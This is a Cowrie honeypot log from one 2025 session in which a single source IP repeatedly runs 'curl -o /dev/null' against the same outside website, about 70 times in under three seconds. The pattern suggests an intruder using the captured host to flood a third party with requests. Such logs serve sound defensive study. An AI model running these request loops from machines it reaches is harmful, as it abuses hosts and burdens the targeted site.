{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.280229Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.318946Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.319652Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.359939Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.360875Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.398124Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.398930Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.435733Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.436514Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.477733Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.478499Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.515552Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.516443Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.556008Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.556682Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.599869Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.600575Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.636728Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.637408Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.674089Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.674816Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.715163Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.715859Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.763261Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.763988Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.815572Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.816634Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.857152Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.857841Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.899685Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.900578Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.939868Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.940823Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.977339Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.978096Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.019468Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.020404Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.057731Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.058507Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.096470Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.097221Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.137466Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.138231Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.175491Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.176260Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.227746Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.228572Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.265245Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.266221Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.312375Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.313129Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.350010Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.350795Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.387579Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.388803Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.432404Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.433131Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.470353Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.471199Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.508583Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.509344Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.548845Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.549644Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.587372Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.588261Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.626322Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.627131Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.667197Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.667948Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.705597Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.706628Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.743978Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.744721Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.781392Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.782176Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.825006Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.826053Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.873332Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.874078Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.911970Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.912543Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.949532Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.950258Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:28.997494Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:28.998302Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.035120Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.035845Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.073155Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.073981Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.111427Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.112103Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.148862Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.149578Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.186940Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.187678Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.226168Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.226972Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.265480Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.266492Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.305284Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.306024Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.346254Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.346998Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.386986Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.387966Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.431081Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.431771Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.467999Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.468747Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.506058Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.506807Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.543273Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.544065Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.583126Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.583898Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.625832Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.626644Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.663633Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.664337Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.703305Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.704230Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.742470Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.743201Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.779570Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.780264Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.843061Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.844098Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.898895Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.899643Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
